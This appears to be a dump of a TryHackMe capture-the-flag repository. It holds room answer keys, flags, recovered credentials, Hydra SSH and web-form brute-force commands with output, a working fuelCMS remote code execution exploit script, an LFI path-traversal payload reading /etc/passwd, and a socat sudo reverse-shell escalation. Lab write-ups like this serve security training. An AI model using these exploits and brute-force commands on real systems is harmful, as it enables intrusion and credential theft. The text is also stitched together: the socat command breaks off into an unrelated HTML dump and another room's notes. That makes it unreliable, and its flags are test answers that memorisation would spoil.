8 |
9 | #2 Use Hydra to bruteforce molly's SSH password. What is flag 2? : `THM{c8eeb0468febbadea859baeb33b2541b}`
10 |
11 | 
12 |
--------------------------------------------------------------------------------
/Hydra/flag2.txt:
--------------------------------------------------------------------------------
1 | THM{c8eeb0468febbadea859baeb33b2541b}
--------------------------------------------------------------------------------
/Hydra/ssh.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/Hydra/ssh.png
--------------------------------------------------------------------------------
/Hydra/ssh.txt:
--------------------------------------------------------------------------------
1 | hydra -l molly -P /usr/share/wordlists/rockyou.txt 10.10.34.149 -t 4 ssh
2 |
3 | Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
4 |
5 | Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-05-25 11:37:13
6 | [DATA] max 4 tasks per 1 server, overall 4 tasks, 14344399 login tries (l:1/p:14344399), ~3586100 tries per task
7 | [DATA] attacking ssh://10.10.34.149:22/
8 | [22][ssh] host: 10.10.34.149 login: molly password: butterfly
9 | 1 of 1 target successfully completed, 1 valid password found
10 | Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-05-25 12:03:07
--------------------------------------------------------------------------------
/Hydra/web.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/Hydra/web.png
--------------------------------------------------------------------------------
/Hydra/web.txt:
--------------------------------------------------------------------------------
1 | hydra -l molly -P /usr/share/wordlists/rockyou.txt 10.10.34.149 http-post-form "/:username=^USER^&password=^PASS^:F=incorrect" -V
2 |
3 | [80][http-post-form] host: 10.10.34.149 login: molly password: sunshine
--------------------------------------------------------------------------------
/Ignite/CVE-2018-16763.py:
--------------------------------------------------------------------------------
1 | # Exploit Title: fuelCMS 1.4.1 - Remote Code Execution
2 | # CVE : CVE-2018-16763
3 |
4 | import requests
5 | import urllib
6 |
7 | url = "http://10.10.12.120"
8 | def find_nth_overlapping(haystack, needle, n):
9 | start = haystack.find(needle)
10 | while start >= 0 and n > 1:
11 | start = haystack.find(needle, start+1)
12 | n -= 1
13 | return start
14 |
15 | while 1:
16 | xxxx = raw_input('cmd:')
17 | burp0_url = url+"/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27"+urllib.quote(xxxx)+"%27%29%2b%27"
18 | proxy = {"http":"http://10.10.12.120:80"}
19 | r = requests.get(burp0_url)
20 |
21 | html = ""
22 | htmlcharset = r.text.find(html)
23 |
24 | begin = r.text[0:20]
25 | dup = find_nth_overlapping(r.text,begin,2)
26 |
27 | print r.text[0:dup]
--------------------------------------------------------------------------------
/Ignite/README.md:
--------------------------------------------------------------------------------
1 | # Ignite | https://tryhackme.com/room/ignite
2 |
3 | ### [Task 1] Root It
4 |
5 | #1 User.txt : `6470e394cbf6dab6a91682cc8585059b`
6 |
7 | #2 Root.txt : `b9bbcb33e11b80be759c4e844862482d`
8 |
--------------------------------------------------------------------------------
/Ignite/database.php:
--------------------------------------------------------------------------------
1 | db->last_query() and profiling of DB queries.
62 | | When you run a query, with this setting set to TRUE (default),
63 | | CodeIgniter will store the SQL statement for debugging purposes.
64 | | However, this may cause high memory usage, especially if you run
65 | | a lot of SQL queries ... disable this to avoid that problem.
66 | |
67 | | The $active_group variable lets you choose which connection group to
68 | | make active. By default there is only one group (the 'default' group).
69 | |
70 | | The $query_builder variables lets you determine whether or not to load
71 | | the query builder class.
72 | */
73 | $active_group = 'default';
74 | $query_builder = TRUE;
75 |
76 | $db['default'] = array(
77 | 'dsn' => '',
78 | 'hostname' => 'localhost',
79 | 'username' => 'root',
80 | 'password' => 'mememe',
81 | 'database' => 'fuel_schema',
82 | 'dbdriver' => 'mysqli',
83 | 'dbprefix' => '',
84 | 'pconnect' => FALSE,
85 | 'db_debug' => (ENVIRONMENT !== 'production'),
86 | 'cache_on' => FALSE,
87 | 'cachedir' => '',
88 | 'char_set' => 'utf8',
89 | 'dbcollat' => 'utf8_general_ci',
90 | 'swap_pre' => '',
91 | 'encrypt' => FALSE,
92 | 'compress' => FALSE,
93 | 'stricton' => FALSE,
94 | 'failover' => array(),
95 | 'save_queries' => TRUE
96 | );
97 |
98 | // used for testing purposes
99 | if (defined('TESTING'))
100 | {
101 | @include(TESTER_PATH.'config/tester_database'.EXT);
102 | }
103 |
--------------------------------------------------------------------------------
/Ignite/database.txt:
--------------------------------------------------------------------------------
1 | cat /var/www/html/fuel/application/config/database.php
--------------------------------------------------------------------------------
/Ignite/exploit-db.txt:
--------------------------------------------------------------------------------
1 | https://www.exploit-db.com/exploits/47138
--------------------------------------------------------------------------------
/Ignite/nmap_basic.nmap:
--------------------------------------------------------------------------------
1 | # Nmap 7.80 scan initiated Mon May 25 14:51:09 2020 as: nmap -A -oN nmap_basic.nmap 10.10.12.120
2 | Nmap scan report for 10.10.12.120
3 | Host is up (0.26s latency).
4 | Not shown: 999 closed ports
5 | PORT STATE SERVICE VERSION
6 | 80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
7 | | http-robots.txt: 1 disallowed entry
8 | |_/fuel/
9 | |_http-server-header: Apache/2.4.18 (Ubuntu)
10 | |_http-title: Welcome to FUEL CMS
11 | No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
12 | TCP/IP fingerprint:
13 | OS:SCAN(V=7.80%E=4%D=5/25%OT=80%CT=1%CU=44385%PV=Y%DS=2%DC=T%G=Y%TM=5ECB8E3
14 | OS:5%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=102%TI=Z%CI=I%TS=A)SEQ(SP=1
15 | OS:02%GCD=1%ISR=103%TI=Z%CI=I%II=I%TS=A)SEQ(SP=102%GCD=1%ISR=103%TI=Z%II=I%
16 | OS:TS=A)OPS(O1=M508ST11NW6%O2=M508ST11NW6%O3=M508NNT11NW6%O4=M508ST11NW6%O5
17 | OS:=M508ST11NW6%O6=M508ST11)WIN(W1=68DF%W2=68DF%W3=68DF%W4=68DF%W5=68DF%W6=
18 | OS:68DF)ECN(R=Y%DF=Y%T=40%W=6903%O=M508NNSNW6%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%
19 | OS:A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0
20 | OS:%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S
21 | OS:=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R
22 | OS:=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N
23 | OS:%T=40%CD=S)
24 |
25 | Network Distance: 2 hops
26 |
27 | TRACEROUTE (using port 993/tcp)
28 | HOP RTT ADDRESS
29 | 1 218.27 ms 10.9.0.1
30 | 2 290.46 ms 10.10.12.120
31 |
32 | OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
33 | # Nmap done at Mon May 25 14:51:57 2020 -- 1 IP address (1 host up) scanned in 47.56 seconds
34 |
--------------------------------------------------------------------------------
/Inclusion/README.md:
--------------------------------------------------------------------------------
1 | # Inclusion | https://tryhackme.com/room/inclusion
2 |
3 | ### [Task 2] Root It
4 |
5 | If you've deployed the VM then try to find the LFI parameters and get the user and root flag.
6 |
7 | #1 user flag : `60989655118397345799`
8 |
9 | 
10 |
11 | #2 root flag : `42964104845495153909`
12 |
13 | 
14 |
--------------------------------------------------------------------------------
/Inclusion/nmap_basic.nmap:
--------------------------------------------------------------------------------
1 | # Nmap 7.80 scan initiated Mon May 25 13:54:16 2020 as: nmap -sC -sS -sV -A -O -oN nmap_basic.nmap 10.10.43.97
2 | Nmap scan report for 10.10.43.97
3 | Host is up (0.20s latency).
4 | Not shown: 998 closed ports
5 | PORT STATE SERVICE VERSION
6 | 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
7 | | ssh-hostkey:
8 | | 2048 e6:3a:2e:37:2b:35:fb:47:ca:90:30:d2:14:1c:6c:50 (RSA)
9 | | 256 73:1d:17:93:80:31:4f:8a:d5:71:cb:ba:70:63:38:04 (ECDSA)
10 | |_ 256 d3:52:31:e8:78:1b:a6:84:db:9b:23:86:f0:1f:31:2a (ED25519)
11 | 80/tcp open http Werkzeug httpd 0.16.0 (Python 3.6.9)
12 | |_http-server-header: Werkzeug/0.16.0 Python/3.6.9
13 | |_http-title: My blog
14 | No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
15 | TCP/IP fingerprint:
16 | OS:SCAN(V=7.80%E=4%D=5/25%OT=22%CT=1%CU=40879%PV=Y%DS=2%DC=T%G=Y%TM=5ECB80D
17 | OS:2%P=x86_64-pc-linux-gnu)SEQ(SP=10A%GCD=1%ISR=10A%TI=Z%CI=Z%II=I%TS=A)OPS
18 | OS:(O1=M508ST11NW6%O2=M508ST11NW6%O3=M508NNT11NW6%O4=M508ST11NW6%O5=M508ST1
19 | OS:1NW6%O6=M508ST11)WIN(W1=F4B3%W2=F4B3%W3=F4B3%W4=F4B3%W5=F4B3%W6=F4B3)ECN
20 | OS:(R=Y%DF=Y%T=40%W=F507%O=M508NNSNW6%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
21 | OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
22 | OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
23 | OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
24 | OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
25 | OS:=S)
26 |
27 | Network Distance: 2 hops
28 | Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
29 |
30 | TRACEROUTE (using port 1025/tcp)
31 | HOP RTT ADDRESS
32 | 1 208.84 ms 10.9.0.1
33 | 2 194.01 ms 10.10.43.97
34 |
35 | OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
36 | # Nmap done at Mon May 25 13:54:50 2020 -- 1 IP address (1 host up) scanned in 35.03 seconds
37 |
--------------------------------------------------------------------------------
/Inclusion/passwd.txt:
--------------------------------------------------------------------------------
1 | http://10.10.43.97/article?name=../../../../../../etc/passwd
2 |
3 | root:x:0:0:root:/root:/bin/bash
4 | daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
5 | bin:x:2:2:bin:/bin:/usr/sbin/nologin
6 | sys:x:3:3:sys:/dev:/usr/sbin/nologin
7 | sync:x:4:65534:sync:/bin:/bin/sync
8 | games:x:5:60:games:/usr/games:/usr/sbin/nologin
9 | man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
10 | lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
11 | mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
12 | news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
13 | uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
14 | proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
15 | www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
16 | backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
17 | list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
18 | irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
19 | gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
20 | nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
21 | systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
22 | systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
23 | syslog:x:102:106::/home/syslog:/usr/sbin/nologin
24 | messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
25 | _apt:x:104:65534::/nonexistent:/usr/sbin/nologin
26 | lxd:x:105:65534::/var/lib/lxd/:/bin/false
27 | uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
28 | dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
29 | landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
30 | pollinate:x:109:1::/var/cache/pollinate:/bin/false
31 | falconfeast:x:1000:1000:falconfeast,,,:/home/falconfeast:/bin/bash
32 |
33 | #falconfeast:rootpassword
34 |
35 | sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
36 | mysql:x:111:116:MySQL Server,,,:/nonexistent:/bin/false
--------------------------------------------------------------------------------
/Inclusion/root.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/Inclusion/root.png
--------------------------------------------------------------------------------
/Inclusion/root.txt:
--------------------------------------------------------------------------------
1 | ╭─root@kali ~/TryHackMe/Rooms/Inclusion ‹master*›
2 | ╰─# socat file:`tty`,raw,echo=0 tcp-listen:1337
3 |
4 | root@inclusion:~# cd /root/
5 | root@inclusion:/root# ls
6 | root.txt
7 | root@inclusion:/root# cat root.txt
8 | 42964104845495153909
9 |
--------------------------------------------------------------------------------
/Inclusion/socat.txt:
--------------------------------------------------------------------------------
1 | get root access if user have sudo access for SOCAT :
2 |
3 | falconfeast@inclusion:~$ sudo -l
4 | Matching Defaults entries for falconfeast on inclusion:
5 | env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
6 |
7 | User falconfeast may run the following commands on inclusion:
8 | (root) NOPASSWD: /usr/bin/socat
9 |
10 | run this in your host system : socat file:`tty`,raw,echo=0 tcp-listen:1337
11 |
12 | and run this on the remote machine : sudo socat tcp-connect:| <!DOCTYPE html> | |
| <html> | |
| <body> | |
| root:x:0:0:root:/root:/bin/bash | |
| daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin | |
| bin:x:2:2:bin:/bin:/usr/sbin/nologin | |
| sys:x:3:3:sys:/dev:/usr/sbin/nologin | |
| sync:x:4:65534:sync:/bin:/bin/sync | |
| games:x:5:60:games:/usr/games:/usr/sbin/nologin | |
| man:x:6:12:man:/var/cache/man:/usr/sbin/nologin | |
| lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin | |
| mail:x:8:8:mail:/var/mail:/usr/sbin/nologin | |
| news:x:9:9:news:/var/spool/news:/usr/sbin/nologin | |
| uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin | |
| proxy:x:13:13:proxy:/bin:/usr/sbin/nologin | |
| www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin | |
| backup:x:34:34:backup:/var/backups:/usr/sbin/nologin | |
| list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin | |
| irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin | |
| gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin | |
| nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin | |
| systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin | |
| systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin | |
| syslog:x:102:106::/home/syslog:/usr/sbin/nologin | |
| messagebus:x:103:107::/nonexistent:/usr/sbin/nologin | |
| _apt:x:104:65534::/nonexistent:/usr/sbin/nologin | |
| lxd:x:105:65534::/var/lib/lxd/:/bin/false | |
| uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin | |
| dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin | |
| landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin | |
| pollinate:x:109:1::/var/cache/pollinate:/bin/false | |
| falconfeast:x:1000:1000:falconfeast,,,:/home/falconfeast:/bin/bash | |
| #falconfeast:rootpassword | |
| sshd:x:110:65534::/run/sshd:/usr/sbin/nologin | |
| mysql:x:111:116:MySQL Server,,,:/nonexistent:/bin/false | |
| </body> | |
| </html> | |
30 |
31 | ### [Task 12] su
32 |
33 | 1 - How do you specify which shell is used when you login? : `-s`
34 |
35 | ### [Task 14] [Section 4: Linux Operators]: ">"
36 |
37 | 1 - How would you output twenty to a file called test : `echo twenty > test`
38 |
39 | ### [Task 18] [Section 4: Linux Operators]: "$"
40 |
41 | 1 - How would you set nootnoot equal to 1111 : `export nootnoot=1111`
42 |
43 | 2 - What is the value of the home environment variable : `/home/shiba2`
44 |
45 | ### [Task 21] Binary - shiba2
46 |
47 | 1 - What is shiba3's password : `happynootnoises`
48 |
49 | 
50 |
51 | ### [Task 24] [Section 5: Advanced File Operations]: chmod
52 |
53 | 1 - What permissions mean the user can read the file, the group can read and write to the file, and no one else can read, write or execute the file? : `460`
54 |
55 | 2 - What permissions mean the user can read, write, and execute the file, the group can read, write, and execute the file, and everyone else can read, write, and execute the file. : `777`
56 |
57 | ### [Task 25] [Section 5: Advanced File Operations] - chown
58 |
59 | 1 - How would you change the owner of file to paradox : `chown paradox file`
60 |
61 | 2 - What about the owner and the group of file to paradox : `chown paradox:paradox file`
62 |
63 | 3 - What flag allows you to operate on every file in the directory at once? : `-R`
64 |
65 | ### [Task 26] [Section 5: Advanced File Operations] - rm
66 |
67 | 1 - What flag deletes every file in a directory : `-r`
68 |
69 | 2 - How do you suppress all warning prompts : `-f`
70 |
71 | ### [Task 27] [Section 5: Advanced File Operations] - mv
72 |
73 | 1 - How would you move file to /tmp : `mv file /tmp`
74 |
75 | ### [Task 29] [Section 5: Advanced file Operations] - cd && mkdir
76 |
77 | 1 - Using relative paths, how would you cd to your home directory. : `cd ~`
78 |
79 | 2 - Using absolute paths how would you make a directory called test in /tmp : `mkdir /tmp/test`
80 |
81 | ### [Task 30] [Section 5: Advanced File Operations] ln
82 |
83 | 1 - How would I link /home/test/testfile to /tmp/test : `ln /home/test/testfile /tmp/test`
84 |
85 | ### [Task 31] [Section 5 - Advanced File Operations]: find
86 |
87 | 1 - How do you find files that have specific permissions? : `-perm`
88 |
89 | 2 - How would you find all the files in /home : `find /home`
90 |
91 | 3 - How would you find all the files owned by paradox on the whole system : `find / -user paradox`
92 |
93 | ### [Task 32] [Section 5: Advanced File Operations] - grep
94 |
95 | 1 - What flag lists line numbers for every string found? : `-n`
96 |
97 | 2 - How would I search for the string boop in the file aaaa in the directory /tmp : `grep boop /tmp/aaaa`
98 |
99 | ### [Task 33] Binary - Shiba3
100 |
101 | 1 - What is shiba4's password : `test1234`
102 |
103 | 
104 |
105 | 
106 |
107 | ### [Task 35] [Section 6: Miscellaneous]: sudo
108 |
109 | 1 - How do you specify which user you want to run a command as. : `-u`
110 |
111 | 2 - How would I run whoami as user jen? : `sudo -u jen whoami`
112 |
113 | 3 - How do you list your current sudo privileges(what commands you can run, who you can run them as etc.) : `-l`
114 |
115 | ### [Task 36] [Section 6: Miscellaneous]: Adding users and groups
116 |
117 | 1 - How would I add the user test to the group test : `sudo usermod -a -G test test`
118 |
119 | ### [Task 43] Bonus Challenge - The True Ending
120 |
121 | 1 - Finish this room off! What is the root.txt flag : `ad91979868d06e19d8e8a9c28be56e0c`
122 |
123 | 
124 |
125 | 
126 |
127 | 
128 |
--------------------------------------------------------------------------------
/Learn Linux/creds.txt:
--------------------------------------------------------------------------------
1 | shiba1 : shiba1
2 |
3 | shiba2 : pinguftw
4 |
5 | shiba3 : happynootnoises
6 |
7 | shiba4 : test1234
8 |
9 | nootnoot : notsofast
--------------------------------------------------------------------------------
/Learn Linux/find-shiba4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/Learn Linux/find-shiba4.png
--------------------------------------------------------------------------------
/Learn Linux/find_user.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/Learn Linux/find_user.png
--------------------------------------------------------------------------------
/Learn Linux/flag.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/Learn Linux/flag.png
--------------------------------------------------------------------------------
/Learn Linux/shiba2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/Learn Linux/shiba2.png
--------------------------------------------------------------------------------
/Learn Linux/shiba3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/Learn Linux/shiba3.png
--------------------------------------------------------------------------------
/Learn Linux/shiba4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/Learn Linux/shiba4.png
--------------------------------------------------------------------------------
/Learn Linux/test1234.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/Learn Linux/test1234.png
--------------------------------------------------------------------------------
/Lord of the Root/README.md:
--------------------------------------------------------------------------------
1 | # Lord of the Root | https://tryhackme.com/room/lordoftheroot
2 |
3 | ### [Task 2] Can you root the box?
4 |
5 | #2 Hmmm, what method is used to reveal hidden ports? : ```port knocking```
6 |
7 | #3 What port is the hidden service on? : ```1337```
8 |
9 | #6 Whats the method to exploit the system for privilege escalation called? : ```buffer overflow```
10 |
11 | #7 Who wrote the message in the flag message in the roots home directory? : ```Gandalf```
12 |
--------------------------------------------------------------------------------
/Lord of the Root/creds.txt:
--------------------------------------------------------------------------------
1 | smeagol : MyPreciousR00t
--------------------------------------------------------------------------------
/Lord of the Root/exploit.rar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/Lord of the Root/exploit.rar
--------------------------------------------------------------------------------
/Lord of the Root/nmap_10.10.213.122.txt:
--------------------------------------------------------------------------------
1 | # Nmap 7.80 scan initiated Sun Mar 22 17:12:31 2020 as: nmap -sV -sS -sC -A -O -oN nmap_10.10.213.122.txt 10.10.213.122
2 | Nmap scan report for 10.10.213.122
3 | Host is up (0.22s latency).
4 | Not shown: 999 closed ports
5 | PORT STATE SERVICE VERSION
6 | 22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.3 (Ubuntu Linux; protocol 2.0)
7 | | ssh-hostkey:
8 | | 1024 3c:3d:e3:8e:35:f9:da:74:20:ef:aa:49:4a:1d:ed:dd (DSA)
9 | | 2048 85:94:6c:87:c9:a8:35:0f:2c:db:bb:c1:3f:2a:50:c1 (RSA)
10 | | 256 f3:cd:aa:1d:05:f2:1e:8c:61:87:25:b6:f4:34:45:37 (ECDSA)
11 | |_ 256 34:ec:16:dd:a7:cf:2a:86:45:ec:65:ea:05:43:89:21 (ED25519)
12 | No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
13 | TCP/IP fingerprint:
14 | OS:SCAN(V=7.80%E=4%D=3/22%OT=22%CT=1%CU=44571%PV=Y%DS=2%DC=T%G=Y%TM=5E774F4
15 | OS:A%P=x86_64-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=106%TI=Z%II=I%TS=8)SEQ(SP=1
16 | OS:05%GCD=1%ISR=106%TI=Z%CI=I%II=I%TS=8)OPS(O1=M54DST11NW6%O2=M54DST11NW6%O
17 | OS:3=M54DNNT11NW6%O4=M54DST11NW6%O5=M54DST11NW6%O6=M54DST11)WIN(W1=68DF%W2=
18 | OS:68DF%W3=68DF%W4=68DF%W5=68DF%W6=68DF)ECN(R=Y%DF=Y%T=40%W=6903%O=M54DNNSN
19 | OS:W6%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%D
20 | OS:F=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O
21 | OS:=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W
22 | OS:=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%R
23 | OS:IPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
24 |
25 | Network Distance: 2 hops
26 | Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
27 |
28 | TRACEROUTE (using port 110/tcp)
29 | HOP RTT ADDRESS
30 | 1 252.23 ms 10.9.0.1
31 | 2 252.44 ms 10.10.213.122
32 |
33 | OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
34 | # Nmap done at Sun Mar 22 17:13:06 2020 -- 1 IP address (1 host up) scanned in 35.02 seconds
35 |
--------------------------------------------------------------------------------
/Lord of the Root/nmap_allport_10.10.213.122.txt:
--------------------------------------------------------------------------------
1 | # Nmap 7.80 scan initiated Sun Mar 22 17:16:17 2020 as: nmap -sS -p- -vv --script vuln -oN nmap_allport_10.10.213.122.txt 10.10.213.122
2 | Increasing send delay for 10.10.213.122 from 0 to 5 due to 880 out of 2932 dropped probes since last increase.
3 | Nmap scan report for 10.10.213.122
4 | Host is up, received echo-reply ttl 63 (0.21s latency).
5 | Scanned at 2020-03-22 17:16:27 IST for 1180s
6 | Not shown: 65533 closed ports
7 | Reason: 65533 resets
8 | PORT STATE SERVICE REASON
9 | 22/tcp open ssh syn-ack ttl 63
10 | |_clamav-exec: ERROR: Script execution failed (use -d to debug)
11 | 1337/tcp open waste syn-ack ttl 63
12 | |_clamav-exec: ERROR: Script execution failed (use -d to debug)
13 |
14 | Read data files from: /usr/bin/../share/nmap
15 | # Nmap done at Sun Mar 22 17:36:07 2020 -- 1 IP address (1 host up) scanned in 1190.68 seconds
16 |
--------------------------------------------------------------------------------
/Mr. Robot CTF/README.md:
--------------------------------------------------------------------------------
1 | # Mr. ROBOT CTF | https://tryhackme.com/room/mrrobot
2 |
3 | ### [Task 2] Hack the machine
4 |
5 | Can you root this Mr. Robot styled machine? This is a virtual machine meant for beginners/intermediate users. There are 3 hidden keys located on the machine, can you find them?
6 |
7 | #1 What is key 1? : ```073403c8a58a1f80d943455fb30724b9```
8 |
9 | #2 What is key 2? : ```822c73956184f694993bede3eb39f959```
10 |
11 | #3 What is key 3? : ```04787ddef27c3dee1ee161b21670b4e4```
12 |
--------------------------------------------------------------------------------
/OWASP Juice Shop/README.md:
--------------------------------------------------------------------------------
1 | # OWASP Juice Shop | https://tryhackme.com/room/juiceshop
2 |
3 | ### [Task 5] Broken Authentication
4 |
5 | #1 reset Jim's password using the forgotten password mechanism - what was the answer to the secret question? : `Samuel`
6 |
7 | #2 What is the administrator password? : `admin123`
8 |
9 | ### [Task 6] Sensitive Data Exposure
10 |
11 | #1 Access a confidential document and enter the name of the first file with the extension ".md" : `acquisitions.md`
12 |
13 | ### [Task 7] Broken Access Control
14 |
15 | #1 Access the administration section of the store - What is the name of the page? : `administration`
16 |
--------------------------------------------------------------------------------
/OhSINT/README.md:
--------------------------------------------------------------------------------
1 | # OhSINT | https://tryhackme.com/room/ohsint
2 |
3 | ### [Task 1] OhSINT
4 |
5 | What information can you possible get starting with just one photo?
6 |
7 | #1 What is this users avatar of? : ```cat```
8 |
9 | #2 What city is this person in? : ```London```
10 |
11 | #3 Whats the SSID of the WAP he connected to? : ```UnileverWiFi```
12 |
13 | #4 What is his personal email address? : ```OWoodflint@gmail.com```
14 |
15 | #5 What site did you find his email address on? : ```Github```
16 |
17 | #6 Where has he gone on holiday? : ```New York```
18 |
19 | #7 What is this persons password? : ```pennYDr0pper.!```
20 |
--------------------------------------------------------------------------------
/OhSINT/WindowsXP.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/OhSINT/WindowsXP.jpg
--------------------------------------------------------------------------------
/OpenVPN/README.md:
--------------------------------------------------------------------------------
1 | OpenVPN | https://tryhackme.com/room/openvpn
2 |
3 | ### [Task 5] Check you're connected
4 |
5 | #1 What is the flag displayed on the deployed machine's website? : `flag{connection_verified}`
6 |
--------------------------------------------------------------------------------
/Overpass/README.md:
--------------------------------------------------------------------------------
1 | # Overpass | https://tryhackme.com/room/overpass
2 |
3 | ### [Task 1] Overpass
4 |
5 | #1 Hack the machine and get the flag in user.txt : `thm{65c1aaf000506e56996822c6281e6bf7}`
6 |
7 | #2 Escalate your privileges and get the flag in root.txt : `thm{7f336f8c359dbac18d54fdd64ea753bb}`
8 |
--------------------------------------------------------------------------------
/Overpass/gobuster.txt:
--------------------------------------------------------------------------------
1 | 301 - /admin
2 | 301 - /aboutus
3 | 301 - /css
4 | 301 - /downloads
5 | 301 - /img
